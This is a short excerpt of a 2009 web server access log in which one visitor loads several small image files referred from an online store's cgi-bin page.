59.157.203.157 - - [17/Oct/2009:00:42:27 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:32 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:32 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
59.157.203.157 - - [17/Oct/2009:00:42:32 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0"
